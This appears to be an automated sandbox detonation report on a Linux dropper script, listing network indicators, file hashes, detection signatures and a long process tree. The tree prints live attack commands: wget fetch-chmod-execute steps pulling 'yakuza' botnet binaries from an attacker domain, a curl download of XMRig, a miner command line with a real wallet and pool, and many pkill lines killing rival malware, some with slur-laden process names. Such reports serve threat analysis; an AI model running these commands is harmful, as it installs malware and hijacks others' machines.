
[sh -c pkill -9 BAdAsV || busybox pkill -9 BAdAsV]

/usr/bin/pkill

[pkill -9 BAdAsV]

/bin/busybox

[busybox pkill -9 BAdAsV]

/bin/sh

[sh -c pkill -9 Wordmane || busybox pkill -9 Wordmane]

/usr/bin/pkill

[pkill -9 Wordmane]

/bin/busybox

[busybox pkill -9 Wordmane]

/bin/sh

[sh -c pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa]

/usr/bin/pkill

[pkill -9 notyakuzaa]

/bin/busybox

[busybox pkill -9 notyakuzaa]

/bin/sh

[sh -c pkill -9 Belch || busybox pkill -9 Belch]

/usr/bin/pkill

[pkill -9 Belch]

/bin/busybox

[busybox pkill -9 Belch]

/bin/sh

[sh -c pkill -9 Wordnets || busybox pkill -9 Wordnets]

/usr/bin/pkill

[pkill -9 Wordnets]

/bin/busybox

[busybox pkill -9 Wordnets]

/bin/sh

[sh -c pkill -9 obp || busybox pkill -9 obp]

/usr/bin/pkill

[pkill -9 obp]

/bin/busybox

[busybox pkill -9 obp]

/bin/sh

[sh -c pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420]

/usr/bin/pkill

[pkill -9 BigN0gg0r420]

/bin/busybox

[busybox pkill -9 BigN0gg0r420]

/bin/sh

[sh -c pkill -9 X0102I34f || busybox pkill -9 X0102I34f]

/usr/bin/pkill

[pkill -9 X0102I34f]

/bin/busybox

[busybox pkill -9 X0102I34f]

/bin/sh

[sh -c pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi]

/usr/bin/pkill

[pkill -9 ofhasfhiafhoi]

/bin/busybox

[busybox pkill -9 ofhasfhiafhoi]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/sh

[sh -c pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU]

/usr/bin/pkill

[pkill -9 X19I239124UIU]

/bin/busybox

[busybox pkill -9 X19I239124UIU]

/bin/sh

[sh -c pkill -9 oism || busybox pkill -9 oism]

/usr/bin/pkill

[pkill -9 oism]

/bin/busybox

[busybox pkill -9 oism]

/bin/sh

[sh -c pkill -9 Deported || busybox pkill -9 Deported]

/usr/bin/pkill

[pkill -9 Deported]

/bin/busybox

[busybox pkill -9 Deported]

/bin/sh

[sh -c pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO]

/usr/bin/pkill

[pkill -9 XSHJEHHEIIHWO]

/bin/busybox

[busybox pkill -9 XSHJEHHEIIHWO]

/bin/sh

[sh -c pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12]

/usr/bin/pkill

[pkill -9 olsVNwo12]

/bin/busybox

[busybox pkill -9 olsVNwo12]

/bin/sh

[sh -c pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported]

/usr/bin/pkill

[pkill -9 DeportedDeported]

/bin/busybox

[busybox pkill -9 DeportedDeported]

/bin/sh

[sh -c pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1]

/usr/bin/pkill

[pkill -9 XkTer0GbA1]

/bin/busybox

[busybox pkill -9 XkTer0GbA1]

/bin/sh

[sh -c pkill -9 onry0v03 || busybox pkill -9 onry0v03]

/usr/bin/pkill

[pkill -9 onry0v03]

/bin/busybox

[busybox pkill -9 onry0v03]

/bin/sh

[sh -c pkill -9 FortniteDownLOLZ || busybox pkill -9 FortniteDownLOLZ]

/usr/bin/pkill

[pkill -9 FortniteDownLOLZ]

/bin/busybox

[busybox pkill -9 FortniteDownLOLZ]

/bin/sh

[sh -c pkill -9 Y0urM0mGay || busybox pkill -9 Y0urM0mGay]

/usr/bin/pkill

[pkill -9 Y0urM0mGay]

/bin/busybox

[busybox pkill -9 Y0urM0mGay]

Network

Country Destination Domain Proto
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:21 linux-it.abuser.eu tcp
IT 95.234.158.87:56121 linux-it.abuser.eu tcp

Files

/tmp/yakuza.mips

MD5 371732a722f576ce663cf832412521a8
SHA1 7d8f25bfc26af545c568ffc5c0afe8c4cd35de40
SHA256 11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0
SHA512 c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014

/tmp/xmrig

MD5 8f4fff0ded94f1141768220906abfbb8
SHA1 ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256 b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA512 0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 02:41

Reported

2024-11-24 02:43

Platform

debian9-mipsel-20240611-en

Max time kernel

150s

Max time network

152s

Command Line

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/yakuza.mips /tmp/yakuza.mips N/A
N/A /tmp/xmrig /tmp/xmrig N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/pkill N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/yakuza.x86 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.m68k /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm4 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm5 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.mipsel /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i686 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.ppc /usr/bin/wget N/A
File opened for modification /tmp/S�@@p�~@8 /bin/sh N/A
File opened for modification /tmp/yakuza.sh /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm7 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.sparc /usr/bin/wget N/A
File opened for modification /tmp/xmrig /usr/bin/curl N/A
File opened for modification /tmp/yakuza.mips /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm6 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i586 /usr/bin/wget N/A

Processes

/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/bin/sh

[sh -c pkill -9 902i13 || busybox pkill -9 902i13]

/usr/bin/pkill

[pkill -9 902i13]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/busybox

[busybox pkill -9 902i13]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/sh

[sh -c pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/pkill

[pkill -9 HOHO-LUGO7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/busybox

[busybox pkill -9 HOHO-LUGO7]

/bin/sh

[sh -c pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL]

/usr/bin/pkill

[pkill -9 HOHO-U79OL]

/bin/busybox

[busybox pkill -9 HOHO-U79OL]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/sh

[sh -c pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87]

/usr/bin/pkill

[pkill -9 JuYfouyf87]

/bin/busybox

[busybox pkill -9 JuYfouyf87]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/sh

[sh -c pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE]

/usr/bin/pkill

[pkill -9 LOLKIKEEEDDE]

/bin/busybox

[busybox pkill -9 LOLKIKEEEDDE]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/sh

[sh -c pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e]

/usr/bin/pkill

[pkill -9 ekjheory98e]

/bin/busybox

[busybox pkill -9 ekjheory98e]

/bin/sh

[sh -c pkill -9 scansh4 || busybox pkill -9 scansh4]

/usr/bin/pkill

[pkill -9 scansh4]

/bin/busybox

[busybox pkill -9 scansh4]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/sh

[sh -c pkill -9 MDMA || busybox pkill -9 MDMA]

/usr/bin/pkill

[pkill -9 MDMA]

/bin/busybox

[busybox pkill -9 MDMA]

/bin/sh

[sh -c pkill -9 fdevalvex || busybox pkill -9 fdevalvex]

/usr/bin/pkill

[pkill -9 fdevalvex]

/bin/busybox

[busybox pkill -9 fdevalvex]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/sh

[sh -c pkill -9 scanspc || busybox pkill -9 scanspc]

/usr/bin/pkill

[pkill -9 scanspc]

/bin/busybox

[busybox pkill -9 scanspc]

/bin/sh

[sh -c pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ]

/usr/bin/pkill

[pkill -9 MELTEDNINJAREALZ]

/bin/busybox

[busybox pkill -9 MELTEDNINJAREALZ]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/sh

[sh -c pkill -9 flexsonskids || busybox pkill -9 flexsonskids]

/usr/bin/pkill

[pkill -9 flexsonskids]

/bin/busybox

[busybox pkill -9 flexsonskids]

/bin/sh

[sh -c pkill -9 scanx86 || busybox pkill -9 scanx86]

/usr/bin/pkill

[pkill -9 scanx86]

/bin/busybox

[busybox pkill -9 scanx86]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/sh

[sh -c pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL]

/usr/bin/pkill

[pkill -9 MISAKI-U79OL]

/bin/busybox

[busybox pkill -9 MISAKI-U79OL]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/sh

[sh -c pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe]

/usr/bin/pkill

[pkill -9 foAxi102kxe]

/bin/busybox

[busybox pkill -9 foAxi102kxe]

/bin/sh

[sh -c pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj]

/usr/bin/pkill

[pkill -9 swodjwodjwoj]

/bin/busybox

[busybox pkill -9 swodjwodjwoj]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/sh

[sh -c pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l]

/usr/bin/pkill

[pkill -9 MmKiy7f87l]

/bin/busybox

[busybox pkill -9 MmKiy7f87l]

/bin/sh

[sh -c pkill -9 freecookiex86 || busybox pkill -9 freecookiex86]

/usr/bin/pkill

[pkill -9 freecookiex86]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/busybox

[busybox pkill -9 freecookiex86]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

/bin/sh

[sh -c pkill -9 sysgpu || busybox pkill -9 sysgpu]

/bin/grep

[grep -v grep]

/bin/grep

[grep xmrig]

/bin/ps

[ps x]

/bin/grep

[grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW]

/usr/bin/pkill

[pkill -9 sysgpu]

/bin/busybox

[busybox pkill -9 sysgpu]

/usr/bin/curl

[curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/sh

[sh -c pkill -9 frgege || busybox pkill -9 frgege]

/usr/bin/pkill

[pkill -9 frgege]

/bin/busybox

[busybox pkill -9 frgege]

/bin/sh

[sh -c pkill -9 sysupdater || busybox pkill -9 sysupdater]

/usr/bin/pkill

[pkill -9 sysupdater]

/bin/busybox

[busybox pkill -9 sysupdater]

/bin/sh

[sh -c pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd]

/usr/bin/pkill

[pkill -9 0DnAzepd]

/bin/busybox

[busybox pkill -9 0DnAzepd]

/bin/sh

[sh -c pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69]

/usr/bin/pkill

[pkill -9 NiGGeRD0nks69]

/bin/busybox

[busybox pkill -9 NiGGeRD0nks69]

/bin/sh

[sh -c pkill -9 frgreu || busybox pkill -9 frgreu]

/usr/bin/pkill

[pkill -9 frgreu]

/bin/busybox

[busybox pkill -9 frgreu]

/bin/sh

[sh -c pkill -9 telnetd || busybox pkill -9 telnetd]

/usr/bin/pkill

[pkill -9 telnetd]

/bin/busybox

[busybox pkill -9 telnetd]

/bin/sh

[sh -c pkill -9 0x766f6964 || busybox pkill -9 0x766f6964]

/usr/bin/pkill

[pkill -9 0x766f6964]

/bin/busybox

[busybox pkill -9 0x766f6964]

/bin/sh

[sh -c pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337]

/usr/bin/pkill

[pkill -9 NiGGeRd0nks1337]

/bin/busybox

[busybox pkill -9 NiGGeRd0nks1337]

/bin/chmod

[chmod +x xmrig]

/usr/bin/nohup

[nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker875 --tls --cpu-priority=3 --asm=auto]

/tmp/xmrig

[./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker875 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker875 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[sh -c pkill -9 gaft || busybox pkill -9 gaft]

/usr/bin/pkill

[pkill -9 gaft]

/bin/busybox

[busybox pkill -9 gaft]

/bin/sh

[sh -c pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa]

/usr/bin/pkill

[pkill -9 urasgbsigboa]

/bin/busybox

[busybox pkill -9 urasgbsigboa]

/bin/sh

[sh -c pkill -9 120i3UI49 || busybox pkill -9 120i3UI49]

/usr/bin/pkill

[pkill -9 120i3UI49]

/bin/busybox

[busybox pkill -9 120i3UI49]

/bin/sh

[sh -c pkill -9 OaF3 || busybox pkill -9 OaF3]

/usr/bin/pkill

[pkill -9 OaF3]

/bin/busybox

[busybox pkill -9 OaF3]

/bin/sh

[sh -c pkill -9 geae || busybox pkill -9 geae]

/usr/bin/pkill

[pkill -9 geae]

/bin/busybox

[busybox pkill -9 geae]

/bin/sh

[sh -c pkill -9 vaiolmao || busybox pkill -9 vaiolmao]

/usr/bin/pkill

[pkill -9 vaiolmao]

/bin/busybox

[busybox pkill -9 vaiolmao]

/bin/sh

[sh -c pkill -9 123123a || busybox pkill -9 123123a]

/usr/bin/pkill

[pkill -9 123123a]

/bin/busybox

[busybox pkill -9 123123a]

/bin/sh

[sh -c pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D]

/usr/bin/pkill

[pkill -9 Ofurain0n4H34D]

/bin/busybox

[busybox pkill -9 Ofurain0n4H34D]

/bin/sh

[sh -c pkill -9 ggTrex || busybox pkill -9 ggTrex]

/usr/bin/pkill

[pkill -9 ggTrex]

/bin/busybox

[busybox pkill -9 ggTrex]

/bin/sh

[sh -c pkill -9 wasads || busybox pkill -9 wasads]

/usr/bin/pkill

[pkill -9 wasads]

/bin/busybox

[busybox pkill -9 wasads]

/bin/sh

[sh -c pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD]

/usr/bin/pkill

[pkill -9 1293194hjXD]

/bin/busybox

[busybox pkill -9 1293194hjXD]

/bin/sh

[sh -c pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn]

/usr/bin/pkill

[pkill -9 OthLaLosn]

/bin/busybox

[busybox pkill -9 OthLaLosn]

/bin/sh

[sh -c pkill -9 ggt || busybox pkill -9 ggt]

/usr/bin/pkill

[pkill -9 ggt]

/bin/busybox

[busybox pkill -9 ggt]

/bin/sh

[sh -c pkill -9 wget-log || busybox pkill -9 wget-log]

/usr/bin/pkill

[pkill -9 wget-log]

/bin/busybox

[busybox pkill -9 wget-log]

/bin/sh

[sh -c pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER]

/usr/bin/pkill

[pkill -9 1337SoraLOADER]

/bin/busybox

[busybox pkill -9 1337SoraLOADER]

/bin/sh

[sh -c pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA]

/usr/bin/pkill

[pkill -9 SAIAKINA]

/bin/busybox

[busybox pkill -9 SAIAKINA]

/bin/sh

[sh -c pkill -9 ggtq || busybox pkill -9 ggtq]

/usr/bin/pkill

[pkill -9 ggtq]

/bin/busybox

[busybox pkill -9 ggtq]

/bin/sh

[sh -c pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2]

/usr/bin/pkill

[pkill -9 1378bfp919GRB1Q2]

/bin/busybox

[busybox pkill -9 1378bfp919GRB1Q2]

/bin/sh

[sh -c pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO]

/usr/bin/pkill

[pkill -9 SAIAKUSO]

/bin/busybox

[busybox pkill -9 SAIAKUSO]

/bin/sh

[sh -c pkill -9 ggtr || busybox pkill -9 ggtr]

/usr/bin/pkill

[pkill -9 ggtr]

/bin/busybox

[busybox pkill -9 ggtr]

/bin/sh

[sh -c pkill -9 14Fa || busybox pkill -9 14Fa]

/usr/bin/pkill

[pkill -9 14Fa]

/bin/busybox

[busybox pkill -9 14Fa]

/bin/sh

[sh -c pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337]

/usr/bin/pkill

[pkill -9 SEXSLAVE1337]

/bin/busybox

[busybox pkill -9 SEXSLAVE1337]

/bin/sh

[sh -c pkill -9 ggtt || busybox pkill -9 ggtt]

/usr/bin/pkill

[pkill -9 ggtt]

/bin/busybox

[busybox pkill -9 ggtt]

/bin/sh

[sh -c pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4]

/usr/bin/pkill

[pkill -9 1902a3u912u3u4]

/bin/busybox

[busybox pkill -9 1902a3u912u3u4]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/sh

[sh -c pkill -9 haetrghbr || busybox pkill -9 haetrghbr]

/usr/bin/pkill

[pkill -9 haetrghbr]

/bin/busybox

[busybox pkill -9 haetrghbr]

/bin/sh

[sh -c pkill -9 19ju3d || busybox pkill -9 19ju3d]

/usr/bin/pkill

[pkill -9 19ju3d]

/bin/busybox

[busybox pkill -9 19ju3d]

/bin/sh

[sh -c pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120]

/usr/bin/pkill

[pkill -9 SORAojkf120]

/bin/busybox

[busybox pkill -9 SORAojkf120]

/bin/sh

[sh -c pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92]

/usr/bin/pkill

[pkill -9 hehahejeje92]

/bin/busybox

[busybox pkill -9 hehahejeje92]

/bin/sh

[sh -c pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91]

/usr/bin/pkill

[pkill -9 2U2JDJA901F91]

/bin/busybox

[busybox pkill -9 2U2JDJA901F91]

/bin/sh

[sh -c pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12]

/usr/bin/pkill

[pkill -9 SlaVLav12]

/bin/busybox

[busybox pkill -9 SlaVLav12]

/bin/sh

[sh -c pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh]

/usr/bin/pkill

[pkill -9 helpmedaddthhhhh]

/bin/busybox

[busybox pkill -9 helpmedaddthhhhh]

/bin/sh

[sh -c pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq]

/usr/bin/pkill

[pkill -9 2wgg9qphbq]

/bin/busybox

[busybox pkill -9 2wgg9qphbq]

/bin/sh

[sh -c pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices]

/usr/bin/pkill

[pkill -9 Slav3Th3seD3vices]

/bin/busybox

[busybox pkill -9 Slav3Th3seD3vices]

/bin/sh

[sh -c pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ]

/usr/bin/pkill

[pkill -9 hzSmYZjYMQ]

/bin/busybox

[busybox pkill -9 hzSmYZjYMQ]

/bin/sh

[sh -c pkill -9 5Gbf || busybox pkill -9 5Gbf]

/usr/bin/pkill

[pkill -9 5Gbf]

/bin/busybox

[busybox pkill -9 5Gbf]

/bin/sh

[sh -c pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL]

/usr/bin/pkill

[pkill -9 SoRAxD123LOL]

/bin/busybox

[busybox pkill -9 SoRAxD123LOL]

/bin/sh

[sh -c pkill -9 iaGv || busybox pkill -9 iaGv]

/usr/bin/pkill

[pkill -9 iaGv]

/bin/busybox

[busybox pkill -9 iaGv]

/bin/sh

[sh -c pkill -9 5aA3 || busybox pkill -9 5aA3]

/usr/bin/pkill

[pkill -9 5aA3]

/bin/busybox

[busybox pkill -9 5aA3]

/bin/sh

[sh -c pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL]

/usr/bin/pkill

[pkill -9 SoRAxD420LOL]

/bin/busybox

[busybox pkill -9 SoRAxD420LOL]

/bin/sh

[sh -c pkill -9 insomni || busybox pkill -9 insomni]

/usr/bin/pkill

[pkill -9 insomni]

/bin/busybox

[busybox pkill -9 insomni]

/bin/sh

[sh -c pkill -9 640277 || busybox pkill -9 640277]

/usr/bin/pkill

[pkill -9 640277]

/bin/busybox

[busybox pkill -9 640277]

/bin/sh

[sh -c pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337]

/usr/bin/pkill

[pkill -9 SoraBeReppin1337]

/bin/busybox

[busybox pkill -9 SoraBeReppin1337]

/bin/sh

[sh -c pkill -9 ipcamCache || busybox pkill -9 ipcamCache]

/usr/bin/pkill

[pkill -9 ipcamCache]

/bin/busybox

[busybox pkill -9 ipcamCache]

/bin/sh

[sh -c pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q]

/usr/bin/pkill

[pkill -9 66tlGg9Q]

/bin/busybox

[busybox pkill -9 66tlGg9Q]

/bin/sh

[sh -c pkill -9 T || busybox pkill -9 T]

/usr/bin/pkill

[pkill -9 T]

/bin/busybox

[busybox pkill -9 T]

/bin/sh

[sh -c pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87]

/usr/bin/pkill

[pkill -9 jUYfouyf87]

/bin/busybox

[busybox pkill -9 jUYfouyf87]

/bin/sh

[sh -c pkill -9 6ke3 || busybox pkill -9 6ke3]

/usr/bin/pkill

[pkill -9 6ke3]

/bin/busybox

[busybox pkill -9 6ke3]

/bin/sh

[sh -c pkill -9 TOKYO3 || busybox pkill -9 TOKYO3]

/usr/bin/pkill

[pkill -9 TOKYO3]

/bin/busybox

[busybox pkill -9 TOKYO3]

/bin/sh

[sh -c pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh]

/usr/bin/pkill

[pkill -9 lyEeaXul2dULCVxh]

/bin/busybox

[busybox pkill -9 lyEeaXul2dULCVxh]

/bin/sh

[sh -c pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z]

/usr/bin/pkill

[pkill -9 93OfjHZ2z]

/bin/busybox

[busybox pkill -9 93OfjHZ2z]

/bin/sh

[sh -c pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r]

/usr/bin/pkill

[pkill -9 TY2gD6MZvKc7KU6r]

/bin/busybox

[busybox pkill -9 TY2gD6MZvKc7KU6r]

/bin/sh

[sh -c pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l]

/usr/bin/pkill

[pkill -9 mMkiy6f87l]

/bin/busybox

[busybox pkill -9 mMkiy6f87l]

/bin/sh

[sh -c pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU]

/usr/bin/pkill

[pkill -9 A023UU4U24UIU]

/bin/busybox

[busybox pkill -9 A023UU4U24UIU]

/bin/sh

[sh -c pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd]

/usr/bin/pkill

[pkill -9 TheWeeknd]

/bin/busybox

[busybox pkill -9 TheWeeknd]

/bin/sh

[sh -c pkill -9 mioribitches || busybox pkill -9 mioribitches]

/usr/bin/pkill

[pkill -9 mioribitches]

/bin/busybox

[busybox pkill -9 mioribitches]

/bin/sh

[sh -c pkill -9 A5p9 || busybox pkill -9 A5p9]

/usr/bin/pkill

[pkill -9 A5p9]

/bin/busybox

[busybox pkill -9 A5p9]

/bin/sh

[sh -c pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds]

/usr/bin/pkill

[pkill -9 TheWeeknds]

/bin/busybox

[busybox pkill -9 TheWeeknds]

/bin/sh

[sh -c pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi]

/usr/bin/pkill

[pkill -9 mnblkjpoi]

/bin/busybox

[busybox pkill -9 mnblkjpoi]

/bin/sh

[sh -c pkill -9 AbAd || busybox pkill -9 AbAd]

/usr/bin/pkill

[pkill -9 AbAd]

/bin/busybox

[busybox pkill -9 AbAd]

/bin/sh

[sh -c pkill -9 Tokyos || busybox pkill -9 Tokyos]

/usr/bin/pkill

[pkill -9 Tokyos]

/bin/busybox

[busybox pkill -9 Tokyos]

/bin/sh

